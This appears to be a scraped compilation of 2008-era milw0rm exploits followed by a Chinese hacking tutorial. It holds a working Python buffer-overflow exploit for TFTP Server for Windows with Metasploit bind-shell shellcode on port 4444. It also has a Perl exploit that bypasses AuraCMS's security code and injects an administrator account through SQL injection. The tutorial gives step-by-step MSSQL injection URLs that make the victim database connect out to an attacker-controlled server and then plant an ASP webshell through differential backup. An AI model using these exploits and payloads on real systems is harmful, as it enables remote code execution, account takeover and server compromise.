\x57\\xff\\xd6\\x6a\\x10\\x51""\\x55\\xff\\xd0\\x68\\xa4\\xad\\x2e\\xe9\\x57\\xff\\xd6\\x53\\x55\\xff\\xd0""\\x68\\xe5\\x49\\x86\\x49\\x57\\xff\\xd6\\x50\\x54\\x54\\x55\\xff\\xd0\\x93""\\x68\\xe7\\x79\\xc6\\x79\\x57\\xff\\xd6\\x55\\xff\\xd0\\x66\\x6a\\x64\\x66""\\x68\\x63\\x6d\\x89\\xe5\\x6a\\x50\\x59\\x29\\xcc\\x89\\xe7\\x6a\\x44\\x89""\\xe2\\x31\\xc0\\xf3\\xaa\\xfe\\x42\\x2d\\xfe\\x42\\x2c\\x93\\x8d\\x7a\\x38""\\xab\\xab\\xab\\x68\\x72\\xfe\\xb3\\x16\\xff\\x75\\x44\\xff\\xd6\\x5b\\x57""\\x52\\x51\\x51\\x51\\x6a\\x01\\x51\\x51\\x55\\x51\\xff\\xd0\\x68\\xad\\xd9""\\x05\\xce\\x53\\xff\\xd6\\x6a\\xff\\xff\\x37\\xff\\xd0\\x8b\\x57\\xfc\\x83""\\xc4\\x64\\xff\\xd6\\x52\\xff\\xd0\\x68\\xef\\xce\\xe0\\x60\\x53\\xff\\xd6""\\xff\\xd0")mode = "A"*1019+"\\xeb\\x08\\x90\\x90"+"\\x58\\x14\\xd3\\x74"+"\\x90"*16+shellmuha = "\\x00\\x02" + filename+ "\\0" + mode + "\\0" print "[*] Sending evil packet, ph33r"s.sendto(muha, (host, port))print "[*] Check port 4444 for bindshell"# milw0rm.com [2008-03-26]

#!/usr/bin/python# TFTP Server for Windows V1.4 ST (0day)# http://sourceforge.net/projects/tftp-server/# Tested on Windows Vista SP0.# Coded by Mati Aharoni# muts..at..offensive-security.com# http://www.offensive-security.com/0day/sourceforge-tftpd.py.txt################################################################### bt ~ # sourceforge-tftpd.py# [*] TFTP Server for Windows V1.4 ST (0day)# [*] http://www.offensive-security.com# [*] Sending evil packet, ph33r# [*] Check port 4444 for bindshell# bt ~ # nc -v 172.16.167.134 4444# (UNKNOWN) [172.16.167.134] 4444 (krb524) open# Microsoft Windows [Version 6.0.6000]# Copyright (c) 2006 Microsoft Corporation.  All # rights reserved.## C:\\Windows\\system32>##################################################################import socketimport sysprint "[*] TFTP Server for Windows V1.4 ST (0day)"print "[*] http://www.offensive-security.com"host = '172.16.167.134'port = 69try:   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)except:   print "socket() failed"   sys.exit(1)# Jump back shellcodesc = "\\x6a\\x05\\x59\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x16\\x91\\x9c"sc +="\\x30\\x83\\xeb\\xfc\\xe2\\xf4\\xcf\\x7f\\x45\\x44\\x32\\x65\\xc5\\xb0\\xd7\\x9b"sc +="\\x0c\\xce\\xdb\\x6f\\x51\\xcf\\xf7\\x91\\x9c\\x30"# windows/shell_bind_tcp - 317 bytes# http://www.metasploit.com# EXITFUNC=seh, LPORT=4444shell=("\\xfc\\x6a\\xeb\\x4d\\xe8\\xf9\\xff\\xff\\xff\\x60\\x8b\\x6c\\x24\\x24\\x8b""\\x45\\x3c\\x8b\\x7c\\x05\\x78\\x01\\xef\\x8b\\x4f\\x18\\x8b\\x5f\\x20\\x01""\\xeb\\x49\\x8b\\x34\\x8b\\x01\\xee\\x31\\xc0\\x99\\xac\\x84\\xc0\\x74\\x07""\\xc1\\xca\\x0d\\x01\\xc2\\xeb\\xf4\\x3b\\x54\\x24\\x28\\x75\\xe5\\x8b\\x5f""\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5f\\x1c\\x01\\xeb\\x03\\x2c\\x8b""\\x89\\x6c\\x24\\x1c\\x61\\xc3\\x31\\xdb\\x64\\x8b\\x43\\x30\\x8b\\x40\\x0c""\\x8b\\x70\\x1c\\xad\\x8b\\x40\\x08\\x5e\\x68\\x8e\\x4e\\x0e\\xec\\x50\\xff""\\xd6\\x66\\x53\\x66\\x68\\x33\\x32\\x68\\x77\\x73\\x32\\x5f\\x54\\xff\\xd0""\\x68\\xcb\\xed\\xfc\\x3b\\x50\\xff\\xd6\\x5f\\x89\\xe5\\x66\\x81\\xed\\x08""\\x02\\x55\\x6a\\x02\\xff\\xd0\\x68\\xd9\\x09\\xf5\\xad\\x57\\xff\\xd6\\x53""\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xff\\xd0\\x66\\x68\\x11\\x5c\\x66""\\x53\\x89\\xe1\\x95\\x68\\xa4\\x1a\\x70\\xc7\\x57\\xff\\xd6\\x6a\\x10\\x51""\\x55\\xff\\xd0\\x68\\xa4\\xad\\x2e\\xe9\\x57\\xff\\xd6\\x53\\x55\\xff\\xd0""\\x68\\xe5\\x49\\x86\\x49\\x57\\xff\\xd6\\x50\\x54\\x54\\x55\\xff\\xd0\\x93""\\x68\\xe7\\x79\\xc6\\x79\\x57\\xff\\xd6\\x55\\xff\\xd0\\x66\\x6a\\x64\\x66""\\x68\\x63\\x6d\\x89\\xe5\\x6a\\x50\\x59\\x29\\xcc\\x89\\xe7\\x6a\\x44\\x89""\\xe2\\x31\\xc0\\xf3\\xaa\\xfe\\x42\\x2d\\xfe\\x42\\x2c\\x93\\x8d\\x7a\\x38""\\xab\\xab\\xab\\x68\\x72\\xfe\\xb3\\x16\\xff\\x75\\x44\\xff\\xd6\\x5b\\x57""\\x52\\x51\\x51\\x51\\x6a\\x01\\x51\\x51\\x55\\x51\\xff\\xd0\\x68\\xad\\xd9""\\x05\\xce\\x53\\xff\\xd6\\x6a\\xff\\xff\\x37\\xff\\xd0\\x8b\\x57\\xfc\\x83""\\xc4\\x64\\xff\\xd6\\x52\\xff\\xd0\\x68\\xf0\\x8a\\x04\\x5f\\x53\\xff\\xd6""\\xff\\xd0")filename = "\\x90"*860 + shell + "\\x90"*14 + sc + "\\xeb\\xd0\\x90\\x90" + "\\x2b\\x0e\\x41"mode = "netascii"muha = "\\x00\\x02" + filename+ "\\0" + mode+ "\\0" print "[*] Sending evil packet, ph33r"s.sendto(muha, (host, port))print "[*] Check port 4444 for bindshell"# milw0rm.com [2008-03-26]

#!/usr/bin/perl## Indonesian Newhack Security Advisory# ------------------------------------# AuraCMS 2.x (user.php) - Security Code Bypass & Add Administrator Exploit# Waktu   :  Feb 28 2008 08:00PM# Software  :  AuraCMS   # Versi   :  2.0#      2.1#      2.2.1# Vendor   :  http://www.auracms.org/## ------------------------------------# Audit Oleh   :  NTOS-Team# Lokasi  :  Indonesia | http://newhack.org# Penjelasan  :# # Kutu pada berkas "user.php" direktori "/content"#---//---# 59. if (!$nama || preg_match("/[^a-zA-Z0-9_-]/", $nama)) $error .= "Karakter Username tidak diizinkan kecuali a-z,A-Z,0-9,-, dan _<br />";# 60. if (strlen($nama) > 10) $error .= "Username Terlalu Panjang Maksimal 10 Karakter<br />";# 61. if (strrpos($nama, " ") > 0) $error .= "Username Tidak Boleh Menggunakan Spasi";# 62. if ($koneksi_db->sql_numrows($koneksi_db->sql_query("SELECT user FROM useraura WHERE user='$nama'")) > 0) $error .= "Error: Username ".$nama." sudah terdaftar , silahkan ulangi.<br />";# 63. if ($koneksi_db->sql_numrows($koneksi_db->sql_query("SELECT user FROM temp_useraura WHERE user='$nama'")) > 0) $error .= "Error: Username ".$nama." sudah terdaftar , silahkan ulangi.<br />";# 64. if ($koneksi_db->sql_numrows($koneksi_db->sql_query("SELECT email FROM useraura WHERE email='$email'")) > 0) $error .= "Error: Email ".$email." sudah terdaftar , silahkan ulangi.<br />";# 65. if ($koneksi_db->sql_numrows($koneksi_db->sql_query("SELECT email FROM temp_useraura WHERE email='$email'")) > 0) $error .= "Error: Email ".$email." sudah terdaftar , silahkan ulangi.<br />";# 66. if (!nama)  $error .= "Error: Formulir Nama belum diisi , silahkan ulangi.<br />";# 67. if ($cekperaturan != "1") $error .= "You should be agree with rules and conditions of use!<br />";# 68. if (!nama)  $error .= "Error: Formulir Nama belum diisi , silahkan ulangi.<br />";# 69. if (!password)  $error .= "Error: Formulir Password belum diisi , silahkan ulangi.<br />";# 70. if ($password != $rpassword)  $error .= "Password and Retype Password Not Macth.<br />";# 71. if (!country)  $error .= "Error: Formulir Negara belum diisi , silahkan ulangi.<br />";# 72. checkemail($email);# 73. $code = substr(hexdec(md5("".date("F j")."".$_POST['random_num']."".$sitekey."")), 2, 6);# 74. if (extension_loaded("gd") AND $code != $_POST['gfx_check']) $error .= "Error: Security Code Invalid<br />";# 75.# 76.# 77. if ($error){# 78.        $tengah .='<table width="100%" border="0" cellspacing="0" cellpadding="0" class="middle"><tr><td><table width="100%" class="bodyline"><tr><td align="left"><img src="images/warning.gif" border="0"></td><td align="center"><font class="option">'.$error.'</font></td><td align="right"><img src="images/warning.gif" border="0"></td></tr></table></td></tr></table>';# 79. }else{# 80.        $hasil1 = $koneksi_db->sql_query("INSERT INTO useraura (user, email, password , level, tipe, negara)VALUES('$nama', '$email', '$password','User','aktif', '$country')" );# ---//---# => Security Code Bypass# baris 73 - 74 kode yang menarik,kita coba belah perlahan 2 baris ini# $sitekey sudah terdifinisi di dalam berkas "config.php" direktori "includes"# $_POST['random_num'] nilai acak yang dikirim melalui Form isian registrasi User secara hiden [bukan hasil isian User]# $_POST['gfx_check'] nilai yang dikirim oleh USER melalui Form isian register User mengenai Security Code# dan selengkap nya dapat di baca pada http://ezine.echo.or.id/ezine18/e18.005.txt## => Add Administrator [INSERT Metode]# baik... kita sudah bisa membypass sekuriti kode, sekarang buat admin baru di site target :p# baris 71. variabel "country" jika tidak diisi hasil nya $error, namun sayang hanya sebatas itu saja aturannya :(# kita lihat pada baris 80. VALUES('$nama', '$email', '$password','User','aktif', '$country') kembali disini tidak ada penyaringan # apa yang kamu pikirkan... mmm... menarik... nakal... jahat... tapi INDAH bukan... ;)# ya... bagaimana kalo kami berpikir seperti ini ;# # VALUES('$nama', '$email', '$password','User','aktif', 'Indonesia['),('Attacker', 'attacker@hack.ed', 'MD5_Pass', 'Administrator', 'aktif', 'Undergr0und]')" );## baru ini namanya p0rn0c0d3...,# satu sesi register 2 user yang di buat, pertama user yang sesuai isian form, yang kedua adalah User dengan Administrator hasil keNAKALan User :D# terima kasih untuk author http://www.milw0rm.com/papers/149## => Perbaikan Sederhana# 1. Security Code#    Ganti dengan Captcha yang berdasarkan session, dan cari Captcha yang tidak mudah dibaca OCR# 2. Add Administrator#    Ganti Kode baris 71. pada berkas "user.php" dengan ;# ---//---# 71. if (!$country || preg_match("/[^a-zA-Z]/", $country))   $error .= "Error: Formulir Negara belum diisi , silahkan ulangi.<br />";# ---//---## => Perhatian!# "Exploit ini dibuat untuk pembelajaran, pengetesan dan pembuktian dari apa yang kami pelajari"# Segala penyalahgunaan dan kerusakan yang diakibat dari exploit ini bukan tanggung jawab kami# # =>Newhack Technology, OpenSource & Security# ~ NTOS-Team->[fl3xu5,opt1lc] ~   #use Digest::MD5 qw(md5_hex);use LWP::UserAgent;use Getopt::Long;no warnings;if(!$ARGV[1]) { print "\\n  |--------------------------------------------------|"; print "\\n  |          Indonesian Newhack Technology           |"; print "\\n  |--------------------------------------------------|"; print "\\n  |   AuraCMS <= 2.2.1  (user.php)                   |"; print "\\n  |   1.Security Code Bypass                         |"; print "\\n  |   2.Add Administrator                            |"; print "\\n  |                Coded by NTOS-Team                |"; print "\\n  |--------------------------------------------------|"; print "\\n  | exploit berhasil jika magic_quotes_gpc = off"; print "\\n[!] Penggunaan : "; print "\\n[>] perl auracms-user.pl [Site] [Path] "; print "\\n "; print "\\n[!] Contoh     : "; print "\\n[>] perl auracms-user.pl localhost /auracms2x/"; print "\\n "; print "\\n"; exit;} $host  = $ARGV[0];$path  = $ARGV[1];$injek  = "Indonesia'),('t4mugel4p', 'gelap\\@banget.gitu', '213aa1379cce2862538be1c046319684','Administrator','aktif', 'DuniaGelap";@namabulan  = qw(January February March April May June July August September October November December);$sitekey  = "x1a1MhphAur4kea7V3Rs820dweOwxIw4n3UgSusyM4nt04"; #defaul sitekey dari config.php$tgl   = (localtime)[3];$bln   = (localtime)[4];$bulan   = $namabulan[$bln];$date   = "$bulan $tgl";## Breaking Security Code Auracms 2.x$browser = LWP::UserAgent->new() or die();$getgfx  = $browser -> get("http://".$host.$path."?pilih=user&aksi=register",);$get   = $getgfx -> content; if ($get =~ /random_num" value="(.*?)"><\\/td>/) {  $randnum = $1;  }$gfx = substr(hex(md5_hex($date.$randnum.$sitekey)), 2, 6);## Proses Add Administrator$browser = LWP::UserAgent->new() or die();$postingkomen = $browser -> post("http://".$host.$path."?pilih=user&aksi=register", [   "nama"=>"t1pu4n",   "email"=>"k3tipu\\@nie.yea",   "password"=>"terimakasih",   "rpassword"=>"terimakasih",   "country"=>$injek,   "gfx_check"=>$gfx,   "random_num"=>$randnum,   "cekperaturan"=>"1",   "submit"=>"Submit", ],); $komen = $postingkomen -> content; if ($komen =~ />Please Login With Your Username and Your Password</) { print "[+]Sukses Register User\\n";  print "[+]Silahkan dicoba login\\n"; print "[+]Username : t4mugel4p\\n"; print "[+]Password : t4mugel4p\\n"; exit();} if ($komen =~ />Error/) { print "[!]Terjadi Kesalahan Pada Proses Register\\n";  exit();} print $komen; print "[!]\\n Exploit Gagal!!! ;)\\n";# milw0rm.com [2008-03-28]

文章来自网络,作者不明.

现在注入横飞！工具一大堆，过去手工注入的时代已经不复存在！代之的是NBSI HDSI 啊D注入工具..等等.也是广大菜鸟的最爱了.即使什么也不会.什么也不懂.只需要点几下鼠标.存在注入漏洞的网站密码就出来了.接下来就是扫扫后台.传传马.就完了.就这样简单.碰到SA权限的话就.直接建立号开3389或者上传WEBSHELL.是内网就映射.是DB_OWNER权限的话呢就考虑用备份差异.但是WEB和数据库不在同一台服务器该怎么搞呢？其实也不一定是搞不定.除了往注册表启动键值写DOS命令，让目标服务器下会开机执行，不过也是有局限性的.该用户必须授权于Master这个库.才可调用储存过程.很少有管理员会这样做.所以希望很渺小.如果我们遇到这种情况的话该如何搞呢？看图1

DB权限.列下目录看看数据是否跟WEB在一块.要是在一块可考虑备份差异.不过很可惜.找来找去都没有找到WEB目录.如图2

这是利用MSSQL的XP_dirtree储存过程读取路径.然后写入临时表的结果.以前的NBSI没这功能.小菜门只好扫扫SA啊。弄弄后台之类的.后来NBSI增加了treelist的功能.可列出目录，更为方便查看目录结构.软件信息等等.后来臭要饭的开发了Getwebshell才使这功能毕生光芒,把马插到数据库里，然后把数据库备份为ASP文件.行是可行.但是数据库要是过大的话.几十M的WEBSHELL你说能用吗？Xiaolu的备份差异还算不错了.减少文件大小.进行差异备份.不过还是回到原来一点.数据和WEB不在一块的。

其实.即使数据库和WEB不在一块还是有机会搞的.并不是说一点机会没.一般服务器装好系统什么的.都会装个IIS吧？列他C盘.看看有没有Inetpub这个目录.就知道他有没有装IIS了.但是.不知道他IP也？怎么办呢？可以这样来，PING一下WEB服务器.扫他这一C段的1433端口.看看哪台开了.不过这方法也不好.现在很多主机都启用了防火墙.1433端口就算开了你也扫不着.这该怎么办呢？可以利用opendatasource宏让对方的SQL与自己的数据库建立连接.既然能建立连接.就可以得到数据库服务器的IP地址了.我们来试试看.有几个前提得说一下.第一.你机器必须要有公网IP.而且开放的1433端口要保证能被外网访问到.好.条件满足.就开始做吧！

我现在搞的这站.100%数据和WEB不在一块.但是从C盘看到了Inetpub文件夹.说明这数据库服务器安装了IIS.但是得不到他IP呀.怎么搞哦.简单.就用上面所说的方法搞一下.先在本机建个库先.打开查询分析器输入

create database hack520 Create TABLE zhu(name nvarchar(256) null);Create TABLE J8(id int NULL,name nvarchar(256) null); 点执行.图3

建立了一个hack520的库名.和zhu  J8两个表.zhu里面有name这一个字段.J8也放了两字段名.一个是id一个是name.好了.现在就可以开始建立连接了~~~~~~~先看一下这条SQL语句insert into opendatasource(’sqloledb’,’server=你的IP;uid=SQL用户;pwd=SQL密码;database=建立的库名’) .库名.表名 ‘执行的语句’  恩现在开始吧。。。。

http://www.xxx.com/news.asp?id=126‘insert%20into%20opendatasource(’sqloledb’,’server=219.149.xx.182;uid=sa;pwd=hack520!@#77169;database=hack520′).hack520.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases–

在IE上执行咯.呵呵这个时候对方就会连接到我机器的SQL服务器.不信？netstat -an看一下~图4

哈哈已经连过来了.现在数据库服务器IP知道了.而且数据库服务器又开了80.现在干什么呢？

bak一个webshell上去吧.已知WEB目录C:\\Inetpub\\wwwroot.好.开始

http://www.xxx.com/news.asp?id=126;use tg800;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0×737339323238 backup database @a to disk=@s– 备份当前库

http://www.xxx.com/news.asp?id=126;Drop table [hack520];create table [dbo].[hack520] ([cmd] [image])–

http://www.xxx.com/news.asp?id=126;insert into hack520(cmd) values(0×3C2565786563757465207265717565737428226C2229253E)–  插入蓝屏木马

http://www.xxx.com/news.asp?id=126;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0×433A5C496E65747075625C777777726F6F745C7A68752E617370

backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT– 再次以差异备份得到WEBSHELL http://221.216xxx.xx/zhu.asp

接下来就是用蓝屏木马客户端连接咯.这个就简单了.我这里就不多说了.虽然没有拿到WEB服务器的SHELL.但是至少也不是空手而归.拿到了数据库服务器的SHELL。

以上的思路不错，希望大家遇见类似情况的时候可以拿下，但是这个还是有一定的局限性的。关键在于SQL反向连接，如果对方设有防火墙或者是TCP/IP筛选的话，就不那么乐观了！